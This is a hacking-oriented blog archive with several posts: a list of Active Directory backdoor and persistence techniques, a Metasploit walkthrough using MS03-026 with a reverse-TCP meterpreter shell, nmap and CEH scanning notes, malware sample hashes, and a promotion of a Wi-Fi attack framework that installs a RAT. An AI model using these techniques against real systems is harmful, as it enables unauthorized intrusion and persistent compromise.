domingo, 26 de abril de 2020

Thousand Ways To Backdoor A Windows Domain (Forest)

When the Kerberos elevation of privilege (CVE-2014-6324 / MS14-068) vulnerability has been made public, the remediation paragraph of the following blog post made some waves:
http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx

"The only way a domain compromise can be remediated with a high level of certainty is a complete rebuild of the domain."

Personally, I agree with this, but .... But whether this is the real solution, I'm not sure. And the same applies to compromised computers. When it has been identified that malware was able to run on the computer (e.g. scheduled scan found the malware), there is no easy way to determine with 100% certainty that there is no rootkit on the computer. Thus rebuilding the computer might be a good thing to consider. For paranoids, use new hardware ;)

But rebuilding a single workstation and rebuilding a whole domain is not on the same complexity level. Rebuilding a domain can take weeks or months (or years, which will never happen, as the business will close before that).

There are countless documented methods to backdoor a computer, but I have never seen a post where someone collects all the methods to backdoor a domain. In the following, I will refer to domain admin, but in reality, I mean Domain Admins, Enterprise Admins, and Schema Admins.


Ways to backdoor a domain

So here you go, an incomplete list to backdoor a domain:

  • Create a new domain admin user. Easy to do, easy to detect, easy to remediate
  • Dump password hashes. The attacker can either crack those or just pass-the-hash. Since KB2871997, pass-the-hash might be trickier (https://technet.microsoft.com/library/security/2871997), but not impossible. Easy to do, hard to detect, hard to remediate - just think about service user passwords. And during remediation, consider all passwords compromised, even strong ones.
  • Logon scripts - modify the logon scripts and add something malicious in it. Almost anything detailed in this post can be added :D
  • Use an already available account, and add domain admin privileges to that. Reset its password. Mess with current group memberships - e.g. http://www.exploit-db.com/papers/17167/
  • Backdoor any workstation where domain admins login. While remediating workstations, don't forget to clean the roaming profile. The type of backdoor can use different forms: malware, local admin, password (hidden admin with 500 RID), sticky keys, etc.
  • Backdoor any domain controller server. For advanced attacks, see Skeleton keys 
  • Backdoor files on network shares which are commonly used by domain admins by adding malware to commonly used executables - Backdoor factory
  • Change ownership/permissions on AD partitions - if you have particular details on how to do this specifically, please comment
  • Create a new domain user. Hide admin privileges with SID history. Easy to do, hard to detect, easy to remediate - check Mimikatz experimental for addsid
  • Golden tickets - easy to do, hard to detect, medium remediation
  • Silver tickets - easy to do, hard to detect, medium/hard remediation
  • Backdoor workstations/servers via group policy
    • HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ RunOnce,
    • scheduled tasks (run task 2 years later),
    • sticky-keys with debug
  • Backdoor patch management tool, see slides here
[Update 2017.01.10]


Other tricks

The following list does not fit in the previous "instant admin" tips, but still, it can make the attackers life easier if their primary foothold has been disabled:

  • Backdoor recent backups - and when the backdoor is needed, destroy the files, so the files will be restored from the backdoored backup
  • Backdoor the Exchange server - get a copy of emails
  • Backdoor workstation/server golden image
  • Change permission of logon scripts to allow modification later
  • Place malicious symlinks to file shares, collect hashes via SMB auth tries on specified IP address, grab password hashes later
  • Backdoor remote admin management e.g. HP iLO - e.g. create new user or steal current password
  • Backdoor files e.g. on shares to use in SMB relay
  • Backdoor source code of in-house-developed software
  • Use any type of sniffed or reused passwords in new attacks, e.g. network admin, firewall admin, VPN admin, AV admin, etc.
  • Change the content of the proxy pac file (change browser configuration if necessary), including special exception(s) for a chosen domain(s)  to use proxy on malicious IP. Redirect the traffic, enforce authentication, grab password hashes, ???, profit.
  • Create high privileged users in applications running with high privileges, e.g. MSSQL, Tomcat, and own the machine, impersonate users, grab their credentials, etc. The typical pentest path made easy.
  • Remove patches from servers, change patch policy not to install those patches.
  • Steal Windows root/intermediate CA keys
  • Weaken AD security by changing group policy (e.g. re-enabling LM-hashes)
Update [2015-09-27]: I found this great presentation from Jakob Heidelberg. It mentions (at least) the following techniques, it is worth to check these:
  • Microsoft Local Administrator Password Solution
  • Enroll virtual smart card certificates for domain admins

Forensics

If you have been chosen to remediate a network where attackers gained domain admin privileges, well, you have a lot of things to look for :)

I can recommend two tools which can help you during your investigation:

Lessons learned

But guess what, not all of these problems are solved by rebuilding the AD. One has to rebuild all the computers from scratch as well. Which seems quite impossible. When someone is creating a new AD, it is impossible not to migrate some configuration/data/files from the old domain. And whenever this happens, there is a risk that the new AD will be backdoored as well.

Ok, we are doomed, but what can we do? I recommend proper log analysis, analyze trends, and detect strange patterns in your network. Better spend money on these, than on the domain rebuild. And when you find something, do a proper incident response. And good luck!

Ps: Thanks to Andrew, EQ, and Tileo for adding new ideas to this post.

Check out the host backdooring post as well! :)
Continue reading
Postado por às Nenhum comentário:

sábado, 25 de abril de 2020

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
Related news
Postado por às Nenhum comentário:

CEH: Identifying Services & Scanning Ports | Gathering Network And Host Information | NMAP


CEH scanning methodology is the important step i.e. scanning for open ports over a network. Port is the technique used to scan for open ports. This methodology performed for the observation of the open and close ports running on the targeted machine. Port scanning gathered a valuable information about  the host and the weakness of the system more than ping sweep.

Network Mapping (NMAP)

Basically NMAP stands for Network Mapping. A free open source tool used for scanning ports, service detection, operating system detection and IP address detection of the targeted machine. Moreover, it performs a quick and efficient scanning a large number of machines in a single session to gathered information about ports and system connected to the network. It can be used over UNIX, LINUX and Windows.

There are some terminologies which we should understand directly whenever we heard like Open ports, Filtered ports and Unfiltered ports.

Open Ports means the target machine accepts incoming request on that port cause these ports are used to accept packets due to the configuration of TCP and UDP.

Filtered ports means the ports are usually opened but due to firewall or network filtering the nmap doesn't detect the open ports.

Unfiltered means the nmap is unable to determine whether the port is open or filtered  while the port is accessible.

Types Of NMAP Scan


Scan TypeDescription
Null Scan This scan is performed by both an ethical hackers and black hat hackers. This scan is used to identify the TCP port whether it is open or closed. Moreover, it only works over UNIX  based systems.
TCP connectThe attacker makes a full TCP connection to the target system. There's an opportunity to connect the specifically port which you want to connect with. SYN/ACK signal observed for open ports while RST/ACK signal observed for closed ports.
ACK scanDiscovering the state of firewall with the help ACK scan whether it is stateful or stateless. This scan is typically used for the detection of filtered ports if ports are filtered. Moreover, it only works over the UNIX based systems.
Windows scanThis type of scan is similar to the ACK scan but there is ability to detect an open ports as well filtered ports.
SYN stealth scanThis malicious attack is mostly performed by attacker to detect the communication ports without making full connection to the network.
This is also known as half-open scanning. 

 

All NMAP Commands 


CommandsScan Performed
-sTTCP connect scan
-sSSYN scan
-sFFIN scan
-sXXMAS tree scan
-sNNull scan
-sPPing scan
-sUUDP scan
-sOProtocol scan
-sAACK scan
-sWWindow scan
-sRRPC scan
-sLList/DNS scan
-sIIdle scan
-PoDon't ping
-PTTCP ping
-PSSYN ping
-PIICMP ping
-PBICMP and TCP ping
-PBICMP timestamp
-PMICMP netmask
-oNNormal output
-oXXML output
-oGGreppable output
-oAAll output
-T ParanoidSerial scan; 300 sec between scans
-T SneakySerial scan; 15 sec between scans
-T PoliteSerial scan; .4 sec between scans
-T NormalParallel scan
-T AggressiveParallel scan, 300 sec timeout, and 1.25 sec/probe
-T InsaneParallel scan, 75 sec timeout, and .3 sec/probe

 

How to Scan

You can perform nmap scanning over the windows command prompt followed by the syntax below. For example, If you wanna scan the host with the IP address 192.168.2.1 using a TCP connect scan type, enter this command:

nmap 192.168.2.1 –sT

nmap -sT 192.168.2.1

Related news

Postado por às Nenhum comentário:

quinta-feira, 23 de abril de 2020

$$$ Bug Bounty $$$

What is Bug Bounty ?



A bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.




Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.


Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.  In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.


While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.
More info

  1. Como Aprender A Hackear Desde Cero
  2. Hacking Ético Con Herramientas Python Pdf
  3. Curso De Hacker Gratis Desde Cero
  4. Hacker Definicion Informatica
  5. Ultimate Hacking Keyboard
Postado por às Nenhum comentário:

Linux/AirDropBot Samples



Reference








Download

       
      Other malware


Hashes

MD5
SHA256
SHA1
85a8aad8d938c44c3f3f51089a60ec16
1a75642976449d37acd14b19f67ed7d69499c41aa6304e78c7b2d977e0910e37
2f0079bb42d5088f1fec341cb68f15cdd447ac43
2c0afe7b13cdd642336ccc7b3e952d8d
64c0e594d4926a293a1f1771187db8cfb44a0dda80d8b25b4f0c975e1e77745c
fef65085a92654cbcf1e3e0d851c6cda8dd3b03d
94b8337a2d217286775bcc36d9c862d2
71c02b99046c3be12e31577aa6623ce47dfb7f369e67af564d2bd499080c03b6
d5deeb1b61026479acb421583b7b82d09d63e921
417151777eaaccfc62f778d33fd183ff
bf6941e644a430fef43afc749479859665a57b711d5483c2c7072049c7db17b7
f76b9447db23229edae17a3160e04df41bc35a9d
d31f047c125deb4c2f879d88b083b9d5
2785845c97a69e15c9c1535216732a9d24bcf8f7244ce7872a2b0d2d4bcb92c3
4693505ef4c029112c4b85a16762cf90f0d69c15
ff1eb225f31e5c29dde47c147f40627e
f7ab3d315961d84da43f30a186136a56f5aa1e9afe6b56a0d357accd5f0ab81a
d5f2a976b703b5e687ffc58c408e0bc880838ae7
f3aed39202b51afdd1354adc8362d6bf
fa2bc8d988c8dfbdc965f1373bd80e9f5862868397c1bcb5e84b1e9c1756e0e2
31f0bca917cfbffcc126219439d38fe80d5c8460
083a5f463cb84f7ae8868cb2eb6a22eb
d654850f7785a5adb34f0808e2952f66e3784c0a32427fab9e97c75f0a48d9f5
ed4359a2805ce69771253d2257598b5c63c36c8e
9ce4decd27c303a44ab2e187625934f3
a2a245f12ae44cca79f03a465e2dc3dfa222dfcfda1017824b16abf397f16255
710e85ae3d362d3c8f3759319c308ff9b4dcdc86
b6c6c1b2e89de81db8633144f4cb4b7d
2480be0d00193250bc9eb50b35403399ed44f53d5d919600ee5bab14ef769530
ee77141054ac8d2fad062bcd79832b5f481c7dfb
abd5008522f69cca92f8eefeb5f160e2
509299df2f6150f59ed777873d3b7c708587c68a4004b4654a8cf2a640dd50aa
15cf94828c07e080b9c455738f3219859d9ab732
a84bbf660ace4f0159f3d13e058235e9
565deb4b1a7397d2497c75c9635b81d2e3b6427f0c576e5cd3c4224660712b56
c56fea8c1c949394e539d5ab3e3df7dfd329844a
5fec65455bd8c842d672171d475460b6
121c7ebfb99d8ef39f72bf7c787be4c15e2e08b731f01172605a4d34d27f08eb
3b6ca4525c3aad0583400b911b015071a0ea6133
4d3cab2d0c51081e509ad25fbd7ff596
7f71577b63b449c1a9e9aa516fa9e4320fe5f79548a00025a430894a269ab57b
d521f25362791de4d8a82a2683f032c1dd816e74
252e2dfdf04290e7e9fc3c4d61bb3529
834fc5c0ccfde1f3d52d88355717f119221118ee2d26018b417c50d066e9e978
c8f3130e64a6f825b1e97060cf258e9086a2b650
5dcdace449052a596bce05328bd23a3b
22949a7a3424f3b3bdf7d92c5e7a7a0de4eb6bbe9c523d57469944f6a8b1d012
f2c072560559a3f112e2000c8e28ee975b2b9db3
9c66fbe776a97a8613bfa983c7dca149
18c08d3c39170652d4770b2f7785e402b58c1f6c51ba1338be4330498ef268f4
18a99ec770109357d1adbc1c2475b17d4dcca651
59af44a74873ac034bd24ca1c3275af5
1c345b5e7c7fdcc79daa5829e0f93f6ae2646f493ae0ec5e8d66ab84a12a2426
98f789e91809203fbf1b7255bd0579fc86a982ba
9642b8aff1fda24baa6abe0aa8c8b173
98165c65d83fd95379e2e7878ac690c492ac54143d7b12beec525a9d048bedae
bd447e0e77a9192b29da032db8e1216b7b97f9ed
e56cec6001f2f6efc0ad7c2fb840aceb
7a2bf405c5d75e4294c980a26d32e80e108908241751de4c556298826f0960f1
b1c271d11797baac2504916ac80fd9e6fac61973
54d93673f9539f1914008cfe8fd2bbdd
c396a1214956eb35c89b62abc68f7d9e1e5bd0e487f330ed692dd49afed37d5a
72a9b8d499cce2de352644a8ffeb63fd0edd414b
6d202084d4f25a0aa2225589dab536e7
c691fecb7f0d121b5a9b8b807c5767ad17ae3dd9981c47f114d253615d0ef171
a68149c19bfddcdfc537811a3a78cd48c7c74740
cfbf1bd882ae7b87d4b04122d2ab42cb
892986403d33acb57fca1f61fc87d088b721bdd4b8de3cd99942e1735188125b
a067a0cf99650345a32a65f5bc14ab0da97789b6

More information


Postado por às Nenhum comentário:

quarta-feira, 22 de abril de 2020

CEH: Gathering Host And Network Information | Scanning

Scanning

It is important that the information-gathering stage be as complete as possible to identify the best location and targets to scan. After the completion of  footprinting and information gathering methodologies, scanning is performed.
During scanning, the hacker has vision to get information about network an hosts which are connected to that network that can help hackers to determine which type of exploit to use in hacking a system precisely. Information such as an IP addresses, operating system, services, and installed applications.

Scanning is the methodology used to detect the system that are alive and respond on the network or not. Ethical hackers use these type of scanning to identify the IP address of target system. Scanning is also used to determine the availability of the system whether it is connected to the network or not.

Types Of Scanning 

Network ScanningIdentifies IP addresses on a given network or subnet
Port ScanningDetermines open, close, filtered and unfiltered ports and services
Vulnerability ScannerDetect the vulnerability on the target system

Port Scanning ​

Port scanning is the process of identifying open and available TCP/IP ports on a system. Port-scanning tools enable a hacker to learn about the services available on a given system. Each service or application on a machine is associated with a well-known port number. Port Numbers are divided into three ranges:
  • Well-Known Ports: 0-1023
  • Registered Ports: 1024-49151
  • Dynamic Ports: 49152-6553

Network Scanning

Network scanning is performed for the detection of active hosts on a network either you wanna attack them or as a network administrator. Network-scanning tools attempt to identify all the live or responding hosts on the network and their corresponding IP addresses. Hosts are identified by their individual IP addresses.

Vulnerability Scanning

This methodology is used to detect vulnerabilities of computer systems on a network. A vulnerability scanner typically identifies the operating system and version number, including applications that are installed. After that the scanner will try to detect vulnerabilities and weakness in the operating system. During the later attack phase, a hacker can exploit those weaknesses in order to gain access to the system. Moreover, the vulnerability scanner can be detected as well, because the scanner must interact over the network with target machine.

The CEH Scanning Methodology

As a CEH, you should understand the methodology about scanning presented in the figure below. Because this is the actual need of hackers to perform further attacks after the information about network and hosts which are connected to the network. It detects the vulnerabilities in the system bu which hackers can be accessible to that system by exploitation of that vulnerabilities.



Continue reading


  1. Hacking Web Sql Injection Pdf
  2. Curso De Hacking
  3. Nfc Hacking
  4. Hacking Curso
Postado por às Nenhum comentário:

EHTools Framework: A Framework Of Serious Penetration Tools And Wi-Fi Pentesting


About EHTools Framework
   Wi-Fi tools keep getting more and more accessible to beginners, and the EHTools Framework is a framework of serious penetration tools that can be explored easily from within it. This powerful and simple tool can be used for everything from installing new add-ons to grabbing a WPA handshake in a matter of seconds. Plus, it's easy to install, set up, and utilize.

Why choice EHTools Framework?
   Lots of pentesting tools installed by default: More than 58 options installed by default you can find in EHTools Framework such as Metasploit FrameworkWireShark and other tools!

   Password protection and config encryption: In version 2.1.6 the authors added pasword protection for users who think that his/her friend or parents will turn into EHTools Framework and will remove or destroy it. Only for this people the authors create password protection for EHTools Framework 🙂

   Easy in learning and this is the best framework for beginners: EHTools Framework's TUI is very simple for beginners, you can start attack on the local network by choosing an option from main menu. It is very simple, is not it?

   UX/UI impruvements for beginners: It uses the names you supply to connect to the tools needed to execute any attacks you select! Aside from that initial input, the majority of the possible attacks can be performed merely by choosing the option number from the menu. This means you can grab a network handshake or download a new hacking tool like Pupy by just selecting from one of the menu options!

   More than 100 tools you can install from EHTools Framework or Lite: Our framework has more than 100 packages in EHTools Framework archive (on server this archive: 2.3 TB)!

System requirements for EHTools Framework
   Full root access and access to /root folder: All EHTools Framework files and folders will copy to /root/bin and /etc system folders, for copy ehtools data to your system needed root access!

   Bourne-again shell and Gnome-terminal shell needed for EHTools Framework GUI and also without Gnome-terminall shell modules such as (eht1, eht2 and etc.) will not work!

   Good internet connection for server support (only EHTools Framework Pro): The server support for ehtools PRO is one of system requirements, it is needed for collect information about EHTools Framework crashes and it is also needed for check product status such as (you bought ehtools/you did not buy ehtools)

EHTools Framework Installation

   To uninstall EHTools Framework, enter this command: ehtools -r

How to activate EHTools Framework Pro
   This key you can buy on the EHTools website for one dollar! This key is used to activate EHTools Framework PRO enter it in the input field of the activation key in the file install.sh and then you can install EHTools Framework and use it only for educational purposes!

   WARNING: The key works only one week then it changes!
You need to have time to enter it before it is updated!

Enter your ehtools activation key!
You can buy it on the ehtools site!
(activation_key)>

   Also, the the authors do not recommend to change the source code of ehtools because it is very complex and you can mess up something and disrupt the framework!

Selecting version of EHTools Framework
   After executing install.sh it will be ask you to select version of EHTools Framework: Pro or Lite.
   Select Lite if you did not buy EHTools Framework Pro. If you bought Ehtools Framework pro license key from EHTools website, select Pro.

 What version of Ehtools Framework do you want to install?(pro/lite):
If you did not buy Ehtools Framework PRO, select LITE!
If you bought Ehtools Framework PRO, select PRO
(version)>

   If you select EHTools Framework Pro, you will need to activate it with your EHTools Framework Activation Key that you need to bought on the EHTools website. If you have EHTools Framework Activation Key, read the following instructions.

Attacking Frameworks
   Most new Wi-Fi hacking tools rely on many of the same underlying attacks, and scripts that automate using other more familiar tools like Aireplay-ng are often referred to as frameworks. These frameworks try to organize tools in smart or useful ways to take them a step beyond the functionality or usability of the original program.

   An excellent example of this are programs that integrate scanning tools like Airodump-ng, attacks like WPS Pixie-Dust, and cracking tools like Aircrack-ng to create an easy-to-follow attack chain for beginners. Doing this makes the process of using these tools easier to remember and can be seen as sort of a guided tour. While each of these attacks is possible without the hand-holding, the result can be faster or more convenient than trying to do so yourself.

   An example of this the authors have covered is the Airgeddon, a wireless attack framework that does useful things like automating the target selection process and eliminating the time a user spends copying and pasting information between programs. This saves valuable time for even experienced pentesters but has the disadvantage of preventing beginners from understanding what's happening "under the hood" of the attack. While this is true, most of these frameworks are fast, efficient, and dead simple to use, enabling even beginners to take on and disable an entire network.

UX/UI impruvements for beginners
   The EHTools Framework starts by merely typing the letter ehtools or eht into a terminal window, then it asks for the name of your network interfaces after the first run. It uses the names you supply to connect to the tools needed to execute any attacks you select. Aside from that initial input, the majority of the possible attacks can be performed merely by choosing the option number from the menu. This means you can grab a network handshake or download a new hacking tool like Pupy by just selecting from one of the menu options.

Use basic networking tools
   To begin, the we can access data about the network they're currently connected to, as well as any network interfaces, from the main menu. Here, we can find local information by just typing l to pull up local IP information, as seen below.

   This allows us to do things like scan the network for other devices. This part of EHTools Framework gives us better visibility on a network and situational awareness of what devices are around us. The various information can be broken down as follows:
  • if: To run ifconfig and gives the names and information about all network devices
  • 1: Enables wlan0
  • d1: Disables wlan0
  • 2: Enables wlan0mon
  • d2: Disables wlan0mon
  • 3: Randomize or set the MAC address to a specific value
  • 7: View the public IP address your computer is leaving on sites you visit
  • 19: Look up the physical address of a given IP address to determine it's relative location
  • scan: Start an ARP scan on the network to discover nearby devices
  • start: Start monitor mode on the wireless network adapter
  • stop: Stop wireless monitor mode on the network adapter
Use EHTools Framework quick access
   Run it to open quick access menu: ehtools -o
   Run it to update EHTools Framework: ehtools -u
   Run it to remove EHTools Framework: ehtools -r
   Run it to make handshake: ehtools -h
   Run it to open WPS menu: ehtools -w

Install new tools on EHTools Framework
   Part of the fun of Ehtools Framework is how easy it is to add new tools to our arsenal. To demonstrate this, let's download Pupy, a Python-based RAT designed to take control of other computers on the network. We can select option 9 to access the list of tools in EHTools Framework.

   From the next menu, the tools are broken down into major categories, with options for managing the installation of scripts. The options presented are:
  • 1: Wi-Fi tools (tools for attacking wireless networks and network databases)
  • 2: Remote access (tools for getting remote access to other devices and remotely managing them)
  • 3: Information gathering (collecting intelligence on people or website)
  • 4: Website tools (tools for exploiting or attacking sites)
  • 5: Other (a miscellaneous collection of other hacking tools)
   You can also manage your installed tools by accessing option 6. To download Pupy, we'll go to option 2, which is remote access. Here, we will see a list of different tools for remote access, and we can select option 3 for Pupy.

About EHTools Framework server support
   Server support for ehtools Pro is very important, as all error reports are sent to it in order to improve and fix vulnerabilities and bugs!

   COUNCIL: Make a good internet connection for EHTools Framework, to help EHTools Framework access to server!

   If in consequence of bad Internet connection EHTools Framework will not be able to communicate with the server then the framework will not start because of access denial and due to a validation error for check ehtools bought or not bought!

   If there is the bad internet connection, EHTools Framework will say you this:
[*] There is no connection!

   If you did not buy EHTools Framework, EHTools Framework will say you this:
[*] Failed to open session for ehtools!

How to protect EHTools Framework with password

   Do it with install.sh: Create login and password from install.sh.
   Defaults is login: ehtools, password: sloothe.

   Do it when you are going to exit from EHTools Framework, exit with shortcuts:
0 or exit.

   Do not do it when you are going to exit from EHTools Framework. WARNING: Do not just close EHTools Framework window!

Terms of use
   This tool is only for educational purposes only.
   Use this tool wisely and never without permission.
   The authors are not responsible for anything you do with this tool.


Related articles


Postado por às Nenhum comentário:
Assinar: Postagens (Atom)